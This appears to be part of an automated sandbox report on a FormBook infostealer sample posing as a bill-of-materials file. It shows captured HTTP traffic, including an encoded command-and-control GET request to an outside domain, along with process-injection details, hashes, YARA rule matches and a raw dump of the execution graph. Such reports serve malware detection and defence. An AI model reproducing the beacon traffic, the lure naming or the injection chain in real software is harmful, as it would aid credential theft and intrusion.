                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Timestamp: Aug 23, 2024 08:29:07.912918091 CEST  Bytes transferred: 1121  Direction: IN  Data: HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:29:07 GMT
                      Server: Apache
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                      Accept-Ranges: bytes
                      Vary: Accept-Encoding
                      Content-Encoding: gzip
                      Content-Length: 836
                      Content-Type: text/html


                      Session ID: 52  Source IP: 192.168.2.6  Source Port: 49775  Destination IP: 192.185.211.122  Destination Port: 80  PID: 6008  Process: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp: Aug 23, 2024 08:29:09.948939085 CEST  Bytes transferred: 509  Direction: OUT  Data: GET /7o3y/?mV=ZpN4DLSXOzy8qX&Xn70_=34bWgTnU4AX1gKZpgT03P58mZraF9WQxUDpx7/bRsS0fRbM850xuSZ+vkJ4N+S3djb8r5M9tcI2Ggb3yyq8UwsXUXfif+FOOr40nRowl+nZyE3/KMRkY0oHOpy0tGVDF3Z+R9aA= HTTP/1.1
                      Host: www.tadalaturbo.online
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Timestamp: Aug 23, 2024 08:29:10.453043938 CEST  Bytes transferred: 1236  Direction: IN  Data: HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:29:10 GMT
                      Server: Apache
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                      Accept-Ranges: bytes
                      Content-Length: 2361
                      Vary: Accept-Encoding
                      Content-Type: text/html
                      Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x19
                      Timestamp: Aug 23, 2024 08:29:10.453053951 CEST  Bytes transferred: 124  Direction: IN  Data Raw: 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 30 2e 70
                      Data Ascii: 2"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-120.png" sizes="120x120"> <link rel="apple
                      Timestamp: Aug 23, 2024 08:29:10.453190088 CEST  Bytes transferred: 1236  Direction: IN  Data Raw: 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 35 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 35 32 78 31 35 32 22 3e 0d 0a 20 20 20
                      Data Ascii: -touch-icon" href="/cgi-sys/images/favicons/favicon-152.png" sizes="152x152"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-180.png" sizes="180x180"> <link href="/cgi-sys/css/bootstrap.min.css" rel="stylesheet">
                      Timestamp: Aug 23, 2024 08:29:10.453193903 CEST  Bytes transferred: 27  Direction: IN  Data Raw: 2f 64 69 76 3e 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: /div> </body></html>



                      Target ID:0
                      Start time:02:25:04
                      Start date:23/08/2024
                      Path:C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"
                      Imagebase:0x330000
                      File size:1'247'232 bytes
                      MD5 hash:806F72C900778DECCF64F8A4EC8CDBC9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:2
                      Start time:02:25:05
                      Start date:23/08/2024
                      Path:C:\Windows\SysWOW64\svchost.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"
                      Imagebase:0xea0000
                      File size:46'504 bytes
                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2525577951.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2525577951.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2527501783.0000000006980000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2527501783.0000000006980000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2526291195.0000000003C90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2526291195.0000000003C90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:true

                      Target ID:4
                      Start time:02:25:32
                      Start date:23/08/2024
                      Path:C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe"
                      Imagebase:0xda0000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4651797494.0000000002EF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4651797494.0000000002EF0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      Target ID:6
                      Start time:02:25:34
                      Start date:23/08/2024
                      Path:C:\Windows\SysWOW64\rasdial.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\SysWOW64\rasdial.exe"
                      Imagebase:0x9d0000
                      File size:19'456 bytes
                      MD5 hash:A280B0F42A83064C41CFFDC1CD35136E
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4651596001.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4651596001.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:false

                      Target ID:7
                      Start time:02:25:46
                      Start date:23/08/2024
                      Path:C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe"
                      Imagebase:0xda0000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4654251110.00000000056E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4654251110.00000000056E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      Target ID:9
                      Start time:02:25:59
                      Start date:23/08/2024
                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Imagebase:0x7ff728280000
                      File size:676'768 bytes
                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true


                        Execution Graph

                        Execution Coverage:3.2%
                        Dynamic/Decrypted Code Coverage:1.3%
                        Signature Coverage:5%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:55
96248->96260 96261 13822a9 Sleep 96260->96261 96262 13822b7 96261->96262 96263 331098 96268 3342de 96263->96268 96267 3310a7 96269 33a961 22 API calls 96268->96269 96270 3342f5 GetVersionExW 96269->96270 96271 336b57 22 API calls 96270->96271 96272 334342 96271->96272 96273 3393b2 22 API calls 96272->96273 96282 334378 96272->96282 96274 33436c 96273->96274 96276 3337a0 22 API calls 96274->96276 96275 33441b GetCurrentProcess IsWow64Process 96277 334437 96275->96277 96276->96282 96278 373824 GetSystemInfo 96277->96278 96279 33444f LoadLibraryA 96277->96279 96280 334460 GetProcAddress 96279->96280 96281 33449c GetSystemInfo 96279->96281 96280->96281 96284 334470 GetNativeSystemInfo 96280->96284 96285 334476 96281->96285 96282->96275 96283 3737df 96282->96283 96284->96285 96286 33109d 96285->96286 96287 33447a FreeLibrary 96285->96287 96288 3500a3 29 API calls __onexit 96286->96288 96287->96286 96288->96267 96289 3690fa 96290 369107 96289->96290 96293 36911f 96289->96293 96339 35f2d9 20 API calls _abort 96290->96339 96292 36910c 96340 3627ec 26 API calls _abort 96292->96340 96295 36917a 96293->96295 96303 369117 96293->96303 96341 36fdc4 21 API calls 2 library calls 96293->96341 96297 35d955 __fread_nolock 26 API calls 96295->96297 96298 369192 96297->96298 96309 368c32 96298->96309 96300 369199 96301 35d955 __fread_nolock 26 API calls 96300->96301 96300->96303 96302 3691c5 96301->96302 96302->96303 96304 35d955 __fread_nolock 26 API calls 96302->96304 96305 3691d3 96304->96305 96305->96303 96306 35d955 __fread_nolock 26 API calls 96305->96306 96307 3691e3 96306->96307 96308 35d955 __fread_nolock 26 API calls 96307->96308 96308->96303 96310 368c3e ___DestructExceptionObject 96309->96310 96311 368c46 96310->96311 96312 368c5e 96310->96312 96343 35f2c6 20 API calls _abort 96311->96343 96314 368d24 96312->96314 96318 368c97 96312->96318 96350 35f2c6 20 API calls _abort 96314->96350 96315 368c4b 96344 35f2d9 20 API calls _abort 96315->96344 96321 368ca6 96318->96321 
96322 368cbb 96318->96322 96319 368d29 96351 35f2d9 20 API calls _abort 96319->96351 96345 35f2c6 20 API calls _abort 96321->96345 96342 365147 EnterCriticalSection 96322->96342 96324 368cb3 96352 3627ec 26 API calls _abort 96324->96352 96326 368cc1 96328 368cf2 96326->96328 96329 368cdd 96326->96329 96327 368cab 96346 35f2d9 20 API calls _abort 96327->96346 96334 368d45 __fread_nolock 38 API calls 96328->96334 96347 35f2d9 20 API calls _abort 96329->96347 96331 368c53 __wsopen_s 96331->96300 96336 368ced 96334->96336 96335 368ce2 96348 35f2c6 20 API calls _abort 96335->96348 96349 368d1c LeaveCriticalSection __wsopen_s 96336->96349 96339->96292 96340->96303 96341->96295 96342->96326 96343->96315 96344->96331 96345->96327 96346->96324 96347->96335 96348->96336 96349->96331 96350->96319 96351->96324 96352->96331 96353 33f7bf 96354 33f7d3 96353->96354 96355 33fcb6 96353->96355 96356 33fcc2 96354->96356 96358 34fddb 22 API calls 96354->96358 96446 33aceb 23 API calls ISource 96355->96446 96447 33aceb 23 API calls ISource 96356->96447 96360 33f7e5 96358->96360 96360->96356 96361 33f83e 96360->96361 96362 33fd3d 96360->96362 96381 33ed9d ISource 96361->96381 96388 341310 96361->96388 96448 3a1155 22 API calls 96362->96448 96365 384beb 96452 3a359c 82 API calls __wsopen_s 96365->96452 96366 33fef7 96376 33a8c7 22 API calls 96366->96376 96366->96381 96368 34fddb 22 API calls 96372 33ec76 ISource 96368->96372 96370 33f3ae ISource 96370->96381 96449 3a359c 82 API calls __wsopen_s 96370->96449 96371 384600 96378 33a8c7 22 API calls 96371->96378 96371->96381 96372->96365 96372->96366 96372->96368 96372->96370 96372->96371 96373 384b0b 96372->96373 96374 33a8c7 22 API calls 96372->96374 96380 350242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96372->96380 96372->96381 96382 33a961 22 API calls 96372->96382 96383 33fbe3 96372->96383 96386 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 
__Init_thread_footer 96372->96386 96387 3500a3 29 API calls pre_c_initialization 96372->96387 96444 3401e0 239 API calls 2 library calls 96372->96444 96445 3406a0 41 API calls ISource 96372->96445 96450 3a359c 82 API calls __wsopen_s 96373->96450 96374->96372 96376->96381 96378->96381 96380->96372 96382->96372 96383->96370 96383->96381 96384 384bdc 96383->96384 96451 3a359c 82 API calls __wsopen_s 96384->96451 96386->96372 96387->96372 96389 341376 96388->96389 96390 3417b0 96388->96390 96391 341390 96389->96391 96392 386331 96389->96392 96593 350242 5 API calls __Init_thread_wait 96390->96593 96453 341940 96391->96453 96598 3b709c 239 API calls 96392->96598 96396 3417ba 96399 3417fb 96396->96399 96401 339cb3 22 API calls 96396->96401 96398 38633d 96398->96372 96403 386346 96399->96403 96405 34182c 96399->96405 96400 341940 9 API calls 96402 3413b6 96400->96402 96408 3417d4 96401->96408 96402->96399 96404 3413ec 96402->96404 96599 3a359c 82 API calls __wsopen_s 96403->96599 96404->96403 96428 341408 __fread_nolock 96404->96428 96595 33aceb 23 API calls ISource 96405->96595 96594 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96408->96594 96409 341839 96596 34d217 239 API calls 96409->96596 96412 38636e 96600 3a359c 82 API calls __wsopen_s 96412->96600 96413 34152f 96415 34153c 96413->96415 96416 3863d1 96413->96416 96418 341940 9 API calls 96415->96418 96602 3b5745 54 API calls _wcslen 96416->96602 96419 341549 96418->96419 96423 3864fa 96419->96423 96425 341940 9 API calls 96419->96425 96420 34fddb 22 API calls 96420->96428 96421 341872 96597 34faeb 23 API calls 96421->96597 96422 34fe0b 22 API calls 96422->96428 96432 386369 96423->96432 96603 3a359c 82 API calls __wsopen_s 96423->96603 96430 341563 96425->96430 96427 33ec40 239 API calls 96427->96428 96428->96409 96428->96412 96428->96413 96428->96420 96428->96422 96428->96427 96429 3863b2 96428->96429 96428->96432 96601 3a359c 82 API calls __wsopen_s 96429->96601 96430->96423 96433 33a8c7 
22 API calls 96430->96433 96435 3415c7 ISource 96430->96435 96432->96372 96433->96435 96434 341940 9 API calls 96434->96435 96435->96421 96435->96423 96435->96432 96435->96434 96438 34167b ISource 96435->96438 96463 3bd482 96435->96463 96503 3b958b 96435->96503 96506 39d4ce 96435->96506 96509 3b959f 96435->96509 96512 3a6ef1 96435->96512 96436 34171d 96436->96372 96438->96436 96592 34ce17 22 API calls ISource 96438->96592 96444->96372 96445->96372 96446->96356 96447->96362 96448->96381 96449->96381 96450->96381 96451->96365 96452->96381 96454 341981 96453->96454 96461 34195d 96453->96461 96604 350242 5 API calls __Init_thread_wait 96454->96604 96455 3413a0 96455->96400 96457 34198b 96457->96461 96605 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96457->96605 96459 348727 96459->96455 96607 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96459->96607 96461->96455 96606 350242 5 API calls __Init_thread_wait 96461->96606 96608 3a1e96 96463->96608 96465 3bd49d 96466 3bd4ee 96465->96466 96467 3bd4b1 96465->96467 96470 3bd4fc 96466->96470 96639 33b567 39 API calls 96466->96639 96638 339c6e 22 API calls 96467->96638 96471 3bd548 96470->96471 96472 3bd51f 96470->96472 96473 3bd600 96471->96473 96475 3bd55a 96471->96475 96640 339c6e 22 API calls 96472->96640 96612 34f1d8 96473->96612 96477 3bd55f 96475->96477 96478 3bd59d 96475->96478 96480 336270 22 API calls 96477->96480 96481 34fe0b 22 API calls 96478->96481 96485 3bd572 96480->96485 96483 3bd5a3 96481->96483 96489 336270 22 API calls 96483->96489 96484 3bd619 96486 336270 22 API calls 96484->96486 96641 336e90 96485->96641 96488 3bd623 96486->96488 96491 3bd630 96488->96491 96492 3bd637 96488->96492 96493 3bd5dd 96489->96493 96490 3bd582 96653 3362b5 22 API calls 96490->96653 96630 336d9e MultiByteToWideChar 96491->96630 96655 336e14 24 API calls 96492->96655 96496 336e90 22 API calls 96493->96496 96499 3bd5ea 96496->96499 96498 3bd635 96656 3362b5 22 API calls 96498->96656 
96654 3362b5 22 API calls 96499->96654 96502 3bd4be 96502->96435 96661 3b7f59 96503->96661 96505 3b959b 96505->96435 96794 39dbbe lstrlenW 96506->96794 96510 3b7f59 120 API calls 96509->96510 96511 3b95af 96510->96511 96511->96435 96513 33a961 22 API calls 96512->96513 96514 3a6f1d 96513->96514 96515 33a961 22 API calls 96514->96515 96516 3a6f26 96515->96516 96517 3a6f3a 96516->96517 96950 33b567 39 API calls 96516->96950 96519 337510 53 API calls 96517->96519 96524 3a6f57 _wcslen 96519->96524 96520 3a70bf 96523 334ecb 94 API calls 96520->96523 96521 3a6fbc 96522 337510 53 API calls 96521->96522 96525 3a6fc8 96522->96525 96526 3a70d0 96523->96526 96524->96520 96524->96521 96532 3a70e9 96524->96532 96530 33a8c7 22 API calls 96525->96530 96534 3a6fdb 96525->96534 96527 3a70e5 96526->96527 96528 334ecb 94 API calls 96526->96528 96529 33a961 22 API calls 96527->96529 96527->96532 96528->96527 96531 3a711a 96529->96531 96530->96534 96533 33a961 22 API calls 96531->96533 96532->96435 96537 3a7126 96533->96537 96535 3a7027 96534->96535 96538 3a7005 96534->96538 96539 33a8c7 22 API calls 96534->96539 96536 337510 53 API calls 96535->96536 96541 3a7034 96536->96541 96542 33a961 22 API calls 96537->96542 96540 3333c6 22 API calls 96538->96540 96539->96538 96543 3a700f 96540->96543 96544 3a703d 96541->96544 96545 3a7047 96541->96545 96546 3a712f 96542->96546 96547 337510 53 API calls 96543->96547 96548 33a8c7 22 API calls 96544->96548 96951 39e199 GetFileAttributesW 96545->96951 96550 33a961 22 API calls 96546->96550 96551 3a701b 96547->96551 96548->96545 96553 3a7138 96550->96553 96555 336350 22 API calls 96551->96555 96552 3a7050 96556 3a7063 96552->96556 96557 334c6d 22 API calls 96552->96557 96554 337510 53 API calls 96553->96554 96558 3a7145 96554->96558 96555->96535 96559 337510 53 API calls 96556->96559 96565 3a7069 96556->96565 96557->96556 96799 33525f 96558->96799 96561 3a70a0 96559->96561 96952 39d076 57 API calls 96561->96952 96562 3a7166 96564 334c6d 22 API calls 
96562->96564 96566 3a7175 96564->96566 96565->96532 96567 3a71a9 96566->96567 96568 334c6d 22 API calls 96566->96568 96569 33a8c7 22 API calls 96567->96569 96570 3a7186 96568->96570 96571 3a71ba 96569->96571 96570->96567 96574 336b57 22 API calls 96570->96574 96572 336350 22 API calls 96571->96572 96573 3a71c8 96572->96573 96575 336350 22 API calls 96573->96575 96576 3a719b 96574->96576 96577 3a71d6 96575->96577 96578 336b57 22 API calls 96576->96578 96579 336350 22 API calls 96577->96579 96578->96567 96580 3a71e4 96579->96580 96581 337510 53 API calls 96580->96581 96582 3a71f0 96581->96582 96841 39d7bc 96582->96841 96584 3a7201 96585 39d4ce 4 API calls 96584->96585 96586 3a720b 96585->96586 96587 3a7239 96586->96587 96588 337510 53 API calls 96586->96588 96591 334f39 68 API calls 96587->96591 96589 3a7229 96588->96589 96895 3a2947 96589->96895 96591->96532 96592->96438 96593->96396 96594->96399 96595->96409 96596->96421 96597->96421 96598->96398 96599->96432 96600->96432 96601->96432 96602->96430 96603->96432 96604->96457 96605->96461 96606->96459 96607->96455 96609 3a1e9f 96608->96609 96610 3a1ea4 96608->96610 96657 3a0f67 24 API calls __fread_nolock 96609->96657 96610->96465 96613 34fe0b 22 API calls 96612->96613 96614 34f1ef 96613->96614 96615 34fddb 22 API calls 96614->96615 96616 34f1fb 96615->96616 96617 34f733 96616->96617 96618 34f741 96617->96618 96619 34f77f 96617->96619 96618->96619 96621 34f74c 96618->96621 96659 39ca5b 22 API calls __fread_nolock 96619->96659 96622 38f2fe 96621->96622 96623 34f75a 96621->96623 96625 34fddb 22 API calls 96622->96625 96658 34f788 22 API calls 96623->96658 96627 38f308 96625->96627 96626 34f762 __fread_nolock 96626->96484 96628 34fe0b 22 API calls 96627->96628 96629 38f32d 96628->96629 96631 336dc7 96630->96631 96632 336e0b 96630->96632 96633 34fe0b 22 API calls 96631->96633 96634 33a6c3 22 API calls 96632->96634 96635 336ddc MultiByteToWideChar 96633->96635 96637 336dff 96634->96637 96636 336e90 22 API calls 
96635->96636 96636->96637 96637->96498 96638->96502 96639->96470 96640->96502 96642 336ea3 96641->96642 96643 336f24 96641->96643 96642->96643 96645 336eaf 96642->96645 96644 3393b2 22 API calls 96643->96644 96651 336ec1 __fread_nolock 96644->96651 96646 336ee7 96645->96646 96647 336eb9 96645->96647 96648 34fddb 22 API calls 96646->96648 96660 336f34 22 API calls 96647->96660 96650 336ef1 96648->96650 96652 34fe0b 22 API calls 96650->96652 96651->96490 96652->96651 96653->96502 96654->96502 96655->96498 96656->96502 96657->96610 96658->96626 96659->96626 96660->96651 96699 337510 96661->96699 96665 3b8281 96666 3b844f 96665->96666 96671 3b828f 96665->96671 96763 3b8ee4 60 API calls 96666->96763 96669 3b845e 96670 3b846a 96669->96670 96669->96671 96685 3b7fd5 ISource 96670->96685 96735 3b7e86 96671->96735 96672 337510 53 API calls 96689 3b8049 96672->96689 96677 3b82c8 96750 34fc70 96677->96750 96680 3b82e8 96756 3a359c 82 API calls __wsopen_s 96680->96756 96681 3b8302 96757 3363eb 22 API calls 96681->96757 96684 3b8311 96758 336a50 22 API calls 96684->96758 96685->96505 96686 3b82f3 GetCurrentProcess TerminateProcess 96686->96681 96688 3b832a 96698 3b8352 96688->96698 96759 3404f0 22 API calls 96688->96759 96689->96665 96689->96672 96689->96685 96754 39417d 22 API calls __fread_nolock 96689->96754 96755 3b851d 42 API calls _strftime 96689->96755 96691 3b84c5 96691->96685 96693 3b84d9 FreeLibrary 96691->96693 96692 3b8341 96760 3b8b7b 75 API calls 96692->96760 96693->96685 96698->96691 96761 3404f0 22 API calls 96698->96761 96762 33aceb 23 API calls ISource 96698->96762 96764 3b8b7b 75 API calls 96698->96764 96700 337525 96699->96700 96716 337522 96699->96716 96701 33755b 96700->96701 96702 33752d 96700->96702 96705 33756d 96701->96705 96712 3750f6 96701->96712 96714 37500f 96701->96714 96765 3551c6 26 API calls 96702->96765 96766 34fb21 51 API calls 96705->96766 96706 37510e 96706->96706 96708 33753d 96709 34fddb 22 API calls 96708->96709 96711 337547 96709->96711 
96713 339cb3 22 API calls 96711->96713 96768 355183 26 API calls 96712->96768 96713->96716 96715 34fe0b 22 API calls 96714->96715 96721 375088 96714->96721 96717 375058 96715->96717 96716->96685 96722 3b8cd3 96716->96722 96718 34fddb 22 API calls 96717->96718 96719 37507f 96718->96719 96720 339cb3 22 API calls 96719->96720 96720->96721 96767 34fb21 51 API calls 96721->96767 96723 33aec9 22 API calls 96722->96723 96724 3b8cee CharLowerBuffW 96723->96724 96769 398e54 96724->96769 96728 33a961 22 API calls 96729 3b8d2a 96728->96729 96776 336d25 96729->96776 96731 3b8d3e 96732 3393b2 22 API calls 96731->96732 96734 3b8d48 _wcslen 96732->96734 96733 3b8e5e _wcslen 96733->96689 96734->96733 96789 3b851d 42 API calls _strftime 96734->96789 96736 3b7ea1 96735->96736 96740 3b7eec 96735->96740 96737 34fe0b 22 API calls 96736->96737 96738 3b7ec3 96737->96738 96739 34fddb 22 API calls 96738->96739 96738->96740 96739->96738 96741 3b9096 96740->96741 96742 3b92ab ISource 96741->96742 96748 3b90ba _strcat _wcslen 96741->96748 96742->96677 96743 33b6b5 39 API calls 96743->96748 96744 33b38f 39 API calls 96744->96748 96745 33b567 39 API calls 96745->96748 96746 337510 53 API calls 96746->96748 96747 35ea0c 21 API calls ___std_exception_copy 96747->96748 96748->96742 96748->96743 96748->96744 96748->96745 96748->96746 96748->96747 96793 39efae 24 API calls _wcslen 96748->96793 96752 34fc85 96750->96752 96751 34fd1d VirtualAlloc 96753 34fceb 96751->96753 96752->96751 96752->96753 96753->96680 96753->96681 96754->96689 96755->96689 96756->96686 96757->96684 96758->96688 96759->96692 96760->96698 96761->96698 96762->96698 96763->96669 96764->96698 96765->96708 96766->96708 96767->96712 96768->96706 96770 398e74 _wcslen 96769->96770 96771 398f63 96770->96771 96774 398ea9 96770->96774 96775 398f68 96770->96775 96771->96728 96771->96734 96774->96771 96790 34ce60 41 API calls 96774->96790 96775->96771 96791 34ce60 41 API calls 96775->96791 96777 336d91 96776->96777 96778 336d34 
96776->96778 96780 3393b2 22 API calls 96777->96780 96778->96777 96779 336d3f 96778->96779 96782 336d5a 96779->96782 96783 374c9d 96779->96783 96781 336d62 __fread_nolock 96780->96781 96781->96731 96792 336f34 22 API calls 96782->96792 96785 34fddb 22 API calls 96783->96785 96786 374ca7 96785->96786 96787 34fe0b 22 API calls 96786->96787 96788 374cda 96787->96788 96789->96733 96790->96774 96791->96775 96792->96781 96793->96748 96795 39dbdc GetFileAttributesW 96794->96795 96796 39d4d5 96794->96796 96795->96796 96797 39dbe8 FindFirstFileW 96795->96797 96796->96435 96797->96796 96798 39dbf9 FindClose 96797->96798 96798->96796 96800 33a961 22 API calls 96799->96800 96801 335275 96800->96801 96802 33a961 22 API calls 96801->96802 96803 33527d 96802->96803 96804 33a961 22 API calls 96803->96804 96805 335285 96804->96805 96806 33a961 22 API calls 96805->96806 96807 33528d 96806->96807 96808 373df5 96807->96808 96809 3352c1 96807->96809 96810 33a8c7 22 API calls 96808->96810 96811 336d25 22 API calls 96809->96811 96812 373dfe 96810->96812 96813 3352cf 96811->96813 96814 33a6c3 22 API calls 96812->96814 96815 3393b2 22 API calls 96813->96815 96817 335304 96814->96817 96816 3352d9 96815->96816 96816->96817 96818 336d25 22 API calls 96816->96818 96819 335349 96817->96819 96820 335325 96817->96820 96830 373e20 96817->96830 96822 3352fa 96818->96822 96821 336d25 22 API calls 96819->96821 96820->96819 96825 334c6d 22 API calls 96820->96825 96823 33535a 96821->96823 96824 3393b2 22 API calls 96822->96824 96826 335370 96823->96826 96832 33a8c7 22 API calls 96823->96832 96824->96817 96828 335332 96825->96828 96827 335384 96826->96827 96833 33a8c7 22 API calls 96826->96833 96831 33538f 96827->96831 96835 33a8c7 22 API calls 96827->96835 96828->96819 96834 336d25 22 API calls 96828->96834 96829 336b57 22 API calls 96838 373ee0 96829->96838 96830->96829 96836 33a8c7 22 API calls 96831->96836 96840 33539a 96831->96840 96832->96826 96833->96827 96834->96819 96835->96831 96836->96840 
